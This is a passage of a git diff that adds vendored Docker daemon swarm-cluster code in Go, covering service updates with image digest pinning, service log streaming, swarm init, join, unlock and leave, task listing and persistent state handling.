+			if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" && queryRegistry {
+				digestImage, err := c.imageWithDigestString(ctx, newCtnr.Image, authConfig)
+				if err != nil {
+					logrus.Warnf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error())
+					// warning in the client response should be concise
+					resp.Warnings = append(resp.Warnings, digestWarning(newCtnr.Image))
+				} else if newCtnr.Image != digestImage {
+					logrus.Debugf("pinning image %s by digest: %s", newCtnr.Image, digestImage)
+					newCtnr.Image = digestImage
+				} else {
+					logrus.Debugf("updating service using supplied digest reference %s", newCtnr.Image)
+				}
+
+				// Replace the context with a fresh one.
+				// If we timed out while communicating with the
+				// registry, then "ctx" will already be expired, which
+				// would cause UpdateService below to fail. Reusing
+				// "ctx" could make it impossible to update a service
+				// if the registry is slow or unresponsive.
+				var cancel func()
+				ctx, cancel = c.getRequestContext()
+				defer cancel()
+			}
+		}
+
+		var rollback swarmapi.UpdateServiceRequest_Rollback
+		switch flags.Rollback {
+		case "", "none":
+			rollback = swarmapi.UpdateServiceRequest_NONE
+		case "previous":
+			rollback = swarmapi.UpdateServiceRequest_PREVIOUS
+		default:
+			return fmt.Errorf("unrecognized rollback option %s", flags.Rollback)
+		}
+
+		_, err = state.controlClient.UpdateService(
+			ctx,
+			&swarmapi.UpdateServiceRequest{
+				ServiceID: currentService.ID,
+				Spec:      &serviceSpec,
+				ServiceVersion: &swarmapi.Version{
+					Index: version,
+				},
+				Rollback: rollback,
+			},
+		)
+		return err
+	})
+	return resp, err
+}
+
+// RemoveService removes a service from a managed swarm cluster.
+func (c *Cluster) RemoveService(input string) error {
+	return c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		service, err := getService(ctx, state.controlClient, input, false)
+		if err != nil {
+			return err
+		}
+
+		_, err = state.controlClient.RemoveService(ctx, &swarmapi.RemoveServiceRequest{ServiceID: service.ID})
+		return err
+	})
+}
+
+// ServiceLogs collects service logs and writes them back to `config.OutStream`
+func (c *Cluster) ServiceLogs(ctx context.Context, selector *backend.LogSelector, config *apitypes.ContainerLogsOptions) (<-chan *backend.LogMessage, error) {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+
+	state := c.currentNodeState()
+	if !state.IsActiveManager() {
+		return nil, c.errNoManager(state)
+	}
+
+	swarmSelector, err := convertSelector(ctx, state.controlClient, selector)
+	if err != nil {
+		return nil, errors.Wrap(err, "error making log selector")
+	}
+
+	// set the streams we'll use
+	stdStreams := []swarmapi.LogStream{}
+	if config.ShowStdout {
+		stdStreams = append(stdStreams, swarmapi.LogStreamStdout)
+	}
+	if config.ShowStderr {
+		stdStreams = append(stdStreams, swarmapi.LogStreamStderr)
+	}
+
+	// Get tail value squared away - the number of previous log lines we look at
+	var tail int64
+	// in ContainerLogs, if the tail value is ANYTHING non-integer, we just set
+	// it to -1 (all). i don't agree with that, but i also think no tail value
+	// should be legitimate. if you don't pass tail, we assume you want "all"
+	if config.Tail == "all" || config.Tail == "" {
+		// tail of 0 means send all logs on the swarmkit side
+		tail = 0
+	} else {
+		t, err := strconv.Atoi(config.Tail)
+		if err != nil {
+			return nil, errors.New("tail value must be a positive integer or \"all\"")
+		}
+		if t < 0 {
+			return nil, errors.New("negative tail values not supported")
+		}
+		// we actually use negative tail in swarmkit to represent messages
+		// backwards starting from the beginning. also, -1 means no logs. so,
+		// basically, for api compat with docker container logs, add one and
+		// flip the sign. we error above if you try to negative tail, which
+		// isn't supported by docker (and would error deeper in the stack
+		// anyway)
+		//
+		// See the logs protobuf for more information
+		tail = int64(-(t + 1))
+	}
+
+	// get the since value - the time in the past we're looking at logs starting from
+	var sinceProto *gogotypes.Timestamp
+	if config.Since != "" {
+		s, n, err := timetypes.ParseTimestamps(config.Since, 0)
+		if err != nil {
+			return nil, errors.Wrap(err, "could not parse since timestamp")
+		}
+		since := time.Unix(s, n)
+		sinceProto, err = gogotypes.TimestampProto(since)
+		if err != nil {
+			return nil, errors.Wrap(err, "could not parse timestamp to proto")
+		}
+	}
+
+	stream, err := state.logsClient.SubscribeLogs(ctx, &swarmapi.SubscribeLogsRequest{
+		Selector: swarmSelector,
+		Options: &swarmapi.LogSubscriptionOptions{
+			Follow:  config.Follow,
+			Streams: stdStreams,
+			Tail:    tail,
+			Since:   sinceProto,
+		},
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	messageChan := make(chan *backend.LogMessage, 1)
+	go func() {
+		defer close(messageChan)
+		for {
+			// Check the context before doing anything.
+			select {
+			case <-ctx.Done():
+				return
+			default:
+			}
+			subscribeMsg, err := stream.Recv()
+			if err == io.EOF {
+				return
+			}
+			// if we're not io.EOF, push the message in and return
+			if err != nil {
+				select {
+				case <-ctx.Done():
+				case messageChan <- &backend.LogMessage{Err: err}:
+				}
+				return
+			}
+
+			for _, msg := range subscribeMsg.Messages {
+				// make a new message
+				m := new(backend.LogMessage)
+				m.Attrs = make([]backend.LogAttr, 0, len(msg.Attrs)+3)
+				// add the timestamp, adding the error if it fails
+				m.Timestamp, err = gogotypes.TimestampFromProto(msg.Timestamp)
+				if err != nil {
+					m.Err = err
+				}
+
+				nodeKey := contextPrefix + ".node.id"
+				serviceKey := contextPrefix + ".service.id"
+				taskKey := contextPrefix + ".task.id"
+
+				// copy over all of the details
+				for _, d := range msg.Attrs {
+					switch d.Key {
+					case nodeKey, serviceKey, taskKey:
+						// we have the final say over context details (in case there
+						// is a conflict (if the user added a detail with a context's
+						// key for some reason))
+					default:
+						m.Attrs = append(m.Attrs, backend.LogAttr{Key: d.Key, Value: d.Value})
+					}
+				}
+				m.Attrs = append(m.Attrs,
+					backend.LogAttr{Key: nodeKey, Value: msg.Context.NodeID},
+					backend.LogAttr{Key: serviceKey, Value: msg.Context.ServiceID},
+					backend.LogAttr{Key: taskKey, Value: msg.Context.TaskID},
+				)
+
+				switch msg.Stream {
+				case swarmapi.LogStreamStdout:
+					m.Source = "stdout"
+				case swarmapi.LogStreamStderr:
+					m.Source = "stderr"
+				}
+				m.Line = msg.Data
+
+				// there could be a case where the reader stops accepting
+				// messages and the context is canceled. we need to check that
+				// here, or otherwise we risk blocking forever on the message
+				// send.
+				select {
+				case <-ctx.Done():
+					return
+				case messageChan <- m:
+				}
+			}
+		}
+	}()
+	return messageChan, nil
+}
+
+// convertSelector takes a backend.LogSelector, which contains raw names that
+// may or may not be valid, and converts them to an api.LogSelector proto. It
+// returns an error if something fails
+func convertSelector(ctx context.Context, cc swarmapi.ControlClient, selector *backend.LogSelector) (*swarmapi.LogSelector, error) {
+	// don't rely on swarmkit to resolve IDs, do it ourselves
+	swarmSelector := &swarmapi.LogSelector{}
+	for _, s := range selector.Services {
+		service, err := getService(ctx, cc, s, false)
+		if err != nil {
+			return nil, err
+		}
+		c := service.Spec.Task.GetContainer()
+		if c == nil {
+			return nil, errors.New("logs only supported on container tasks")
+		}
+		swarmSelector.ServiceIDs = append(swarmSelector.ServiceIDs, service.ID)
+	}
+	for _, t := range selector.Tasks {
+		task, err := getTask(ctx, cc, t)
+		if err != nil {
+			return nil, err
+		}
+		c := task.Spec.GetContainer()
+		if c == nil {
+			return nil, errors.New("logs only supported on container tasks")
+		}
+		swarmSelector.TaskIDs = append(swarmSelector.TaskIDs, task.ID)
+	}
+	return swarmSelector, nil
+}
+
+// imageWithDigestString takes an image such as name or name:tag
+// and returns the image pinned to a digest, such as name@sha256:34234
+func (c *Cluster) imageWithDigestString(ctx context.Context, image string, authConfig *apitypes.AuthConfig) (string, error) {
+	ref, err := reference.ParseAnyReference(image)
+	if err != nil {
+		return "", err
+	}
+	namedRef, ok := ref.(reference.Named)
+	if !ok {
+		if _, ok := ref.(reference.Digested); ok {
+			return image, nil
+		}
+		return "", errors.Errorf("unknown image reference format: %s", image)
+	}
+	// only query registry if not a canonical reference (i.e. with digest)
+	if _, ok := namedRef.(reference.Canonical); !ok {
+		namedRef = reference.TagNameOnly(namedRef)
+
+		taggedRef, ok := namedRef.(reference.NamedTagged)
+		if !ok {
+			return "", errors.Errorf("image reference not tagged: %s", image)
+		}
+
+		repo, _, err := c.config.ImageBackend.GetRepository(ctx, taggedRef, authConfig)
+		if err != nil {
+			return "", err
+		}
+		dscrptr, err := repo.Tags(ctx).Get(ctx, taggedRef.Tag())
+		if err != nil {
+			return "", err
+		}
+
+		namedDigestedRef, err := reference.WithDigest(taggedRef, dscrptr.Digest)
+		if err != nil {
+			return "", err
+		}
+		// return familiar form until interface updated to return type
+		return reference.FamiliarString(namedDigestedRef), nil
+	}
+	// reference already contains a digest, so just return it
+	return reference.FamiliarString(ref), nil
+}
+
+// digestWarning constructs a formatted warning string
+// using the image name that could not be pinned by digest. The
+// formatting is hardcoded, but could me made smarter in the future
+func digestWarning(image string) string {
+	return fmt.Sprintf("image %s could not be accessed on a registry to record\nits digest. Each node will access %s independently,\npossibly leading to different nodes running different\nversions of the image.\n", image, image)
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/swarm.go b/vendor/github.com/docker/docker/daemon/cluster/swarm.go
new file mode 100644
index 0000000000..2f498ce263
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/swarm.go
@@ -0,0 +1,569 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+import (
+	"context"
+	"fmt"
+	"net"
+	"strings"
+	"time"
+
+	apitypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/convert"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/signal"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/manager/encryption"
+	swarmnode "github.com/docker/swarmkit/node"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+// Init initializes new cluster from user provided request.
+func (c *Cluster) Init(req types.InitRequest) (string, error) {
+	c.controlMutex.Lock()
+	defer c.controlMutex.Unlock()
+	if c.nr != nil {
+		if req.ForceNewCluster {
+
+			// Take c.mu temporarily to wait for presently running
+			// API handlers to finish before shutting down the node.
+			c.mu.Lock()
+			if !c.nr.nodeState.IsManager() {
+				return "", errSwarmNotManager
+			}
+			c.mu.Unlock()
+
+			if err := c.nr.Stop(); err != nil {
+				return "", err
+			}
+		} else {
+			return "", errSwarmExists
+		}
+	}
+
+	if err := validateAndSanitizeInitRequest(&req); err != nil {
+		return "", errdefs.InvalidParameter(err)
+	}
+
+	listenHost, listenPort, err := resolveListenAddr(req.ListenAddr)
+	if err != nil {
+		return "", err
+	}
+
+	advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort)
+	if err != nil {
+		return "", err
+	}
+
+	dataPathAddr, err := resolveDataPathAddr(req.DataPathAddr)
+	if err != nil {
+		return "", err
+	}
+
+	localAddr := listenHost
+
+	// If the local address is undetermined, the advertise address
+	// will be used as local address, if it belongs to this system.
+	// If the advertise address is not local, then we try to find
+	// a system address to use as local address. If this fails,
+	// we give up and ask the user to pass the listen address.
+	if net.ParseIP(localAddr).IsUnspecified() {
+		advertiseIP := net.ParseIP(advertiseHost)
+
+		found := false
+		for _, systemIP := range listSystemIPs() {
+			if systemIP.Equal(advertiseIP) {
+				localAddr = advertiseIP.String()
+				found = true
+				break
+			}
+		}
+
+		if !found {
+			ip, err := c.resolveSystemAddr()
+			if err != nil {
+				logrus.Warnf("Could not find a local address: %v", err)
+				return "", errMustSpecifyListenAddr
+			}
+			localAddr = ip.String()
+		}
+	}
+
+	nr, err := c.newNodeRunner(nodeStartConfig{
+		forceNewCluster: req.ForceNewCluster,
+		autolock:        req.AutoLockManagers,
+		LocalAddr:       localAddr,
+		ListenAddr:      net.JoinHostPort(listenHost, listenPort),
+		AdvertiseAddr:   net.JoinHostPort(advertiseHost, advertisePort),
+		DataPathAddr:    dataPathAddr,
+		availability:    req.Availability,
+	})
+	if err != nil {
+		return "", err
+	}
+	c.mu.Lock()
+	c.nr = nr
+	c.mu.Unlock()
+
+	if err := <-nr.Ready(); err != nil {
+		c.mu.Lock()
+		c.nr = nil
+		c.mu.Unlock()
+		if !req.ForceNewCluster { // if failure on first attempt don't keep state
+			if err := clearPersistentState(c.root); err != nil {
+				return "", err
+			}
+		}
+		return "", err
+	}
+	state := nr.State()
+	if state.swarmNode == nil { // should never happen but protect from panic
+		return "", errors.New("invalid cluster state for spec initialization")
+	}
+	if err := initClusterSpec(state.swarmNode, req.Spec); err != nil {
+		return "", err
+	}
+	return state.NodeID(), nil
+}
+
+// Join makes current Cluster part of an existing swarm cluster.
+func (c *Cluster) Join(req types.JoinRequest) error {
+	c.controlMutex.Lock()
+	defer c.controlMutex.Unlock()
+	c.mu.Lock()
+	if c.nr != nil {
+		c.mu.Unlock()
+		return errors.WithStack(errSwarmExists)
+	}
+	c.mu.Unlock()
+
+	if err := validateAndSanitizeJoinRequest(&req); err != nil {
+		return errdefs.InvalidParameter(err)
+	}
+
+	listenHost, listenPort, err := resolveListenAddr(req.ListenAddr)
+	if err != nil {
+		return err
+	}
+
+	var advertiseAddr string
+	if req.AdvertiseAddr != "" {
+		advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort)
+		// For joining, we don't need to provide an advertise address,
+		// since the remote side can detect it.
+		if err == nil {
+			advertiseAddr = net.JoinHostPort(advertiseHost, advertisePort)
+		}
+	}
+
+	dataPathAddr, err := resolveDataPathAddr(req.DataPathAddr)
+	if err != nil {
+		return err
+	}
+
+	nr, err := c.newNodeRunner(nodeStartConfig{
+		RemoteAddr:    req.RemoteAddrs[0],
+		ListenAddr:    net.JoinHostPort(listenHost, listenPort),
+		AdvertiseAddr: advertiseAddr,
+		DataPathAddr:  dataPathAddr,
+		joinAddr:      req.RemoteAddrs[0],
+		joinToken:     req.JoinToken,
+		availability:  req.Availability,
+	})
+	if err != nil {
+		return err
+	}
+
+	c.mu.Lock()
+	c.nr = nr
+	c.mu.Unlock()
+
+	select {
+	case <-time.After(swarmConnectTimeout):
+		return errSwarmJoinTimeoutReached
+	case err := <-nr.Ready():
+		if err != nil {
+			c.mu.Lock()
+			c.nr = nil
+			c.mu.Unlock()
+			if err := clearPersistentState(c.root); err != nil {
+				return err
+			}
+		}
+		return err
+	}
+}
+
+// Inspect retrieves the configuration properties of a managed swarm cluster.
+func (c *Cluster) Inspect() (types.Swarm, error) {
+	var swarm types.Swarm
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		s, err := c.inspect(ctx, state)
+		if err != nil {
+			return err
+		}
+		swarm = s
+		return nil
+	}); err != nil {
+		return types.Swarm{}, err
+	}
+	return swarm, nil
+}
+
+func (c *Cluster) inspect(ctx context.Context, state nodeState) (types.Swarm, error) {
+	s, err := getSwarm(ctx, state.controlClient)
+	if err != nil {
+		return types.Swarm{}, err
+	}
+	return convert.SwarmFromGRPC(*s), nil
+}
+
+// Update updates configuration of a managed swarm cluster.
+func (c *Cluster) Update(version uint64, spec types.Spec, flags types.UpdateFlags) error {
+	return c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		swarm, err := getSwarm(ctx, state.controlClient)
+		if err != nil {
+			return err
+		}
+
+		// Validate spec name.
+		if spec.Annotations.Name == "" {
+			spec.Annotations.Name = "default"
+		} else if spec.Annotations.Name != "default" {
+			return errdefs.InvalidParameter(errors.New(`swarm spec must be named "default"`))
+		}
+
+		// In update, client should provide the complete spec of the swarm, including
+		// Name and Labels. If a field is specified with 0 or nil, then the default value
+		// will be used to swarmkit.
+		clusterSpec, err := convert.SwarmSpecToGRPC(spec)
+		if err != nil {
+			return errdefs.InvalidParameter(err)
+		}
+
+		_, err = state.controlClient.UpdateCluster(
+			ctx,
+			&swarmapi.UpdateClusterRequest{
+				ClusterID: swarm.ID,
+				Spec:      &clusterSpec,
+				ClusterVersion: &swarmapi.Version{
+					Index: version,
+				},
+				Rotation: swarmapi.KeyRotation{
+					WorkerJoinToken:  flags.RotateWorkerToken,
+					ManagerJoinToken: flags.RotateManagerToken,
+					ManagerUnlockKey: flags.RotateManagerUnlockKey,
+				},
+			},
+		)
+		return err
+	})
+}
+
+// GetUnlockKey returns the unlock key for the swarm.
+func (c *Cluster) GetUnlockKey() (string, error) {
+	var resp *swarmapi.GetUnlockKeyResponse
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		client := swarmapi.NewCAClient(state.grpcConn)
+
+		r, err := client.GetUnlockKey(ctx, &swarmapi.GetUnlockKeyRequest{})
+		if err != nil {
+			return err
+		}
+		resp = r
+		return nil
+	}); err != nil {
+		return "", err
+	}
+	if len(resp.UnlockKey) == 0 {
+		// no key
+		return "", nil
+	}
+	return encryption.HumanReadableKey(resp.UnlockKey), nil
+}
+
+// UnlockSwarm provides a key to decrypt data that is encrypted at rest.
+func (c *Cluster) UnlockSwarm(req types.UnlockRequest) error {
+	c.controlMutex.Lock()
+	defer c.controlMutex.Unlock()
+
+	c.mu.RLock()
+	state := c.currentNodeState()
+
+	if !state.IsActiveManager() {
+		// when manager is not active,
+		// unless it is locked, otherwise return error.
+		if err := c.errNoManager(state); err != errSwarmLocked {
+			c.mu.RUnlock()
+			return err
+		}
+	} else {
+		// when manager is active, return an error of "not locked"
+		c.mu.RUnlock()
+		return notLockedError{}
+	}
+
+	// only when swarm is locked, code running reaches here
+	nr := c.nr
+	c.mu.RUnlock()
+
+	key, err := encryption.ParseHumanReadableKey(req.UnlockKey)
+	if err != nil {
+		return errdefs.InvalidParameter(err)
+	}
+
+	config := nr.config
+	config.lockKey = key
+	if err := nr.Stop(); err != nil {
+		return err
+	}
+	nr, err = c.newNodeRunner(config)
+	if err != nil {
+		return err
+	}
+
+	c.mu.Lock()
+	c.nr = nr
+	c.mu.Unlock()
+
+	if err := <-nr.Ready(); err != nil {
+		if errors.Cause(err) == errSwarmLocked {
+			return invalidUnlockKey{}
+		}
+		return errors.Errorf("swarm component could not be started: %v", err)
+	}
+	return nil
+}
+
+// Leave shuts down Cluster and removes current state.
+func (c *Cluster) Leave(force bool) error {
+	c.controlMutex.Lock()
+	defer c.controlMutex.Unlock()
+
+	c.mu.Lock()
+	nr := c.nr
+	if nr == nil {
+		c.mu.Unlock()
+		return errors.WithStack(errNoSwarm)
+	}
+
+	state := c.currentNodeState()
+
+	c.mu.Unlock()
+
+	if errors.Cause(state.err) == errSwarmLocked && !force {
+		// leave a locked swarm without --force is not allowed
+		return errors.WithStack(notAvailableError("Swarm is encrypted and locked. Please unlock it first or use `--force` to ignore this message."))
+	}
+
+	if state.IsManager() && !force {
+		msg := "You are attempting to leave the swarm on a node that is participating as a manager. "
+		if state.IsActiveManager() {
+			active, reachable, unreachable, err := managerStats(state.controlClient, state.NodeID())
+			if err == nil {
+				if active && removingManagerCausesLossOfQuorum(reachable, unreachable) {
+					if isLastManager(reachable, unreachable) {
+						msg += "Removing the last manager erases all current state of the swarm. Use `--force` to ignore this message. "
+						return errors.WithStack(notAvailableError(msg))
+					}
+					msg += fmt.Sprintf("Removing this node leaves %v managers out of %v. Without a Raft quorum your swarm will be inaccessible. ", reachable-1, reachable+unreachable)
+				}
+			}
+		} else {
+			msg += "Doing so may lose the consensus of your cluster. "
+		}
+
+		msg += "The only way to restore a swarm that has lost consensus is to reinitialize it with `--force-new-cluster`. Use `--force` to suppress this message."
+		return errors.WithStack(notAvailableError(msg))
+	}
+	// release readers in here
+	if err := nr.Stop(); err != nil {
+		logrus.Errorf("failed to shut down cluster node: %v", err)
+		signal.DumpStacks("")
+		return err
+	}
+
+	c.mu.Lock()
+	c.nr = nil
+	c.mu.Unlock()
+
+	if nodeID := state.NodeID(); nodeID != "" {
+		nodeContainers, err := c.listContainerForNode(nodeID)
+		if err != nil {
+			return err
+		}
+		for _, id := range nodeContainers {
+			if err := c.config.Backend.ContainerRm(id, &apitypes.ContainerRmConfig{ForceRemove: true}); err != nil {
+				logrus.Errorf("error removing %v: %v", id, err)
+			}
+		}
+	}
+
+	// todo: cleanup optional?
+	if err := clearPersistentState(c.root); err != nil {
+		return err
+	}
+	c.config.Backend.DaemonLeavesCluster()
+	return nil
+}
+
+// Info returns information about the current cluster state.
+func (c *Cluster) Info() types.Info {
+	info := types.Info{
+		NodeAddr: c.GetAdvertiseAddress(),
+	}
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+
+	state := c.currentNodeState()
+	info.LocalNodeState = state.status
+	if state.err != nil {
+		info.Error = state.err.Error()
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	if state.IsActiveManager() {
+		info.ControlAvailable = true
+		swarm, err := c.inspect(ctx, state)
+		if err != nil {
+			info.Error = err.Error()
+		}
+
+		info.Cluster = &swarm.ClusterInfo
+
+		if r, err := state.controlClient.ListNodes(ctx, &swarmapi.ListNodesRequest{}); err != nil {
+			info.Error = err.Error()
+		} else {
+			info.Nodes = len(r.Nodes)
+			for _, n := range r.Nodes {
+				if n.ManagerStatus != nil {
+					info.Managers = info.Managers + 1
+				}
+			}
+		}
+	}
+
+	if state.swarmNode != nil {
+		for _, r := range state.swarmNode.Remotes() {
+			info.RemoteManagers = append(info.RemoteManagers, types.Peer{NodeID: r.NodeID, Addr: r.Addr})
+		}
+		info.NodeID = state.swarmNode.NodeID()
+	}
+
+	return info
+}
+
+func validateAndSanitizeInitRequest(req *types.InitRequest) error {
+	var err error
+	req.ListenAddr, err = validateAddr(req.ListenAddr)
+	if err != nil {
+		return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err)
+	}
+
+	if req.Spec.Annotations.Name == "" {
+		req.Spec.Annotations.Name = "default"
+	} else if req.Spec.Annotations.Name != "default" {
+		return errors.New(`swarm spec must be named "default"`)
+	}
+
+	return nil
+}
+
+func validateAndSanitizeJoinRequest(req *types.JoinRequest) error {
+	var err error
+	req.ListenAddr, err = validateAddr(req.ListenAddr)
+	if err != nil {
+		return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err)
+	}
+	if len(req.RemoteAddrs) == 0 {
+		return errors.New("at least 1 RemoteAddr is required to join")
+	}
+	for i := range req.RemoteAddrs {
+		req.RemoteAddrs[i], err = validateAddr(req.RemoteAddrs[i])
+		if err != nil {
+			return fmt.Errorf("invalid remoteAddr %q: %v", req.RemoteAddrs[i], err)
+		}
+	}
+	return nil
+}
+
+func validateAddr(addr string) (string, error) {
+	if addr == "" {
+		return addr, errors.New("invalid empty address")
+	}
+	newaddr, err := opts.ParseTCPAddr(addr, defaultAddr)
+	if err != nil {
+		return addr, nil
+	}
+	return strings.TrimPrefix(newaddr, "tcp://"), nil
+}
+
+func initClusterSpec(node *swarmnode.Node, spec types.Spec) error {
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+	for conn := range node.ListenControlSocket(ctx) {
+		if ctx.Err() != nil {
+			return ctx.Err()
+		}
+		if conn != nil {
+			client := swarmapi.NewControlClient(conn)
+			var cluster *swarmapi.Cluster
+			for i := 0; ; i++ {
+				lcr, err := client.ListClusters(ctx, &swarmapi.ListClustersRequest{})
+				if err != nil {
+					return fmt.Errorf("error on listing clusters: %v", err)
+				}
+				if len(lcr.Clusters) == 0 {
+					if i < 10 {
+						time.Sleep(200 * time.Millisecond)
+						continue
+					}
+					return errors.New("empty list of clusters was returned")
+				}
+				cluster = lcr.Clusters[0]
+				break
+			}
+			// In init, we take the initial default values from swarmkit, and merge
+			// any non nil or 0 value from spec to GRPC spec. This will leave the
+			// default value alone.
+			// Note that this is different from Update(), as in Update() we expect
+			// user to specify the complete spec of the cluster (as they already know
+			// the existing one and knows which field to update)
+			clusterSpec, err := convert.MergeSwarmSpecToGRPC(spec, cluster.Spec)
+			if err != nil {
+				return fmt.Errorf("error updating cluster settings: %v", err)
+			}
+			_, err = client.UpdateCluster(ctx, &swarmapi.UpdateClusterRequest{
+				ClusterID:      cluster.ID,
+				ClusterVersion: &cluster.Meta.Version,
+				Spec:           &clusterSpec,
+			})
+			if err != nil {
+				return fmt.Errorf("error updating cluster settings: %v", err)
+			}
+			return nil
+		}
+	}
+	return ctx.Err()
+}
+
+func (c *Cluster) listContainerForNode(nodeID string) ([]string, error) {
+	var ids []string
+	filters := filters.NewArgs()
+	filters.Add("label", fmt.Sprintf("com.docker.swarm.node.id=%s", nodeID))
+	containers, err := c.config.Backend.Containers(&apitypes.ContainerListOptions{
+		Filters: filters,
+	})
+	if err != nil {
+		return []string{}, err
+	}
+	for _, c := range containers {
+		ids = append(ids, c.ID)
+	}
+	return ids, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/tasks.go b/vendor/github.com/docker/docker/daemon/cluster/tasks.go
new file mode 100644
index 0000000000..de1240dfe8
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/tasks.go
@@ -0,0 +1,87 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+import (
+	"context"
+
+	apitypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/convert"
+	swarmapi "github.com/docker/swarmkit/api"
+)
+
+// GetTasks returns a list of tasks matching the filter options.
+func (c *Cluster) GetTasks(options apitypes.TaskListOptions) ([]types.Task, error) {
+	var r *swarmapi.ListTasksResponse
+
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		filterTransform := func(filter filters.Args) error {
+			if filter.Contains("service") {
+				serviceFilters := filter.Get("service")
+				for _, serviceFilter := range serviceFilters {
+					service, err := getService(ctx, state.controlClient, serviceFilter, false)
+					if err != nil {
+						return err
+					}
+					filter.Del("service", serviceFilter)
+					filter.Add("service", service.ID)
+				}
+			}
+			if filter.Contains("node") {
+				nodeFilters := filter.Get("node")
+				for _, nodeFilter := range nodeFilters {
+					node, err := getNode(ctx, state.controlClient, nodeFilter)
+					if err != nil {
+						return err
+					}
+					filter.Del("node", nodeFilter)
+					filter.Add("node", node.ID)
+				}
+			}
+			if !filter.Contains("runtime") {
+				// default to only showing container tasks
+				filter.Add("runtime", "container")
+				filter.Add("runtime", "")
+			}
+			return nil
+		}
+
+		filters, err := newListTasksFilters(options.Filters, filterTransform)
+		if err != nil {
+			return err
+		}
+
+		r, err = state.controlClient.ListTasks(
+			ctx,
+			&swarmapi.ListTasksRequest{Filters: filters})
+		return err
+	}); err != nil {
+		return nil, err
+	}
+
+	tasks := make([]types.Task, 0, len(r.Tasks))
+	for _, task := range r.Tasks {
+		t, err := convert.TaskFromGRPC(*task)
+		if err != nil {
+			return nil, err
+		}
+		tasks = append(tasks, t)
+	}
+	return tasks, nil
+}
+
+// GetTask returns a task by an ID.
+func (c *Cluster) GetTask(input string) (types.Task, error) {
+	var task *swarmapi.Task
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		t, err := getTask(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+		task = t
+		return nil
+	}); err != nil {
+		return types.Task{}, err
+	}
+	return convert.TaskFromGRPC(*task)
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/utils.go b/vendor/github.com/docker/docker/daemon/cluster/utils.go
new file mode 100644
index 0000000000..d55e0012b7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/utils.go
@@ -0,0 +1,63 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+import (
+	"encoding/json"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+func loadPersistentState(root string) (*nodeStartConfig, error) {
+	dt, err := ioutil.ReadFile(filepath.Join(root, stateFile))
+	if err != nil {
+		return nil, err
+	}
+	// missing certificate means no actual state to restore from
+	if _, err := os.Stat(filepath.Join(root, "certificates/swarm-node.crt")); err != nil {
+		if os.IsNotExist(err) {
+			clearPersistentState(root)
+		}
+		return nil, err
+	}
+	var st nodeStartConfig
+	if err := json.Unmarshal(dt, &st); err != nil {
+		return nil, err
+	}
+	return &st, nil
+}
+
+func savePersistentState(root string, config nodeStartConfig) error {
+	dt, err := json.Marshal(config)
+	if err != nil {
+		return err
+	}
+	return ioutils.AtomicWriteFile(filepath.Join(root, stateFile), dt, 0600)
+}
+
+func clearPersistentState(root string) error {
+	// todo: backup this data instead of removing?
+	// rather than delete the entire swarm directory, delete the contents in order to preserve the inode
+	// (for example, allowing it to be bind-mounted)
+	files, err := ioutil.ReadDir(root)
+	if err != nil {
+		return err
+	}
+
+	for _, f := range files {
+		if err := os.RemoveAll(filepath.Join(root, f.Name())); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+func removingManagerCausesLossOfQuorum(reachable, unreachable int) bool {
+	return reachable-2 <= unreachable
+}
+
+func isLastManager(reachable, unreachable int) bool {
+	return reachable == 1 && unreachable == 0
+}
diff --git a/vendor/github.com/docker/docker/daemon/commit.go b/vendor/github.com/docker/docker/daemon/commit.go
index 1e7bffb1dc..0f6f440514 100644
--- a/vendor/github.com/docker/docker/daemon/commit.go
+++ b/vendor/github.com/docker/docker/daemon/commit.go
@@ -1,9 +1,7 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"encoding/json"
 	"fmt"
-	"io"
 	"runtime"
 	"strings"
 	"time"
@@ -11,12 +9,8 @@ import (
 	"github.com/docker/docker/api/types/backend"
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/builder/dockerfile"
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/dockerversion"
-	"github.com/docker/docker/image"
-	"github.com/docker/docker/layer"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
 )
 
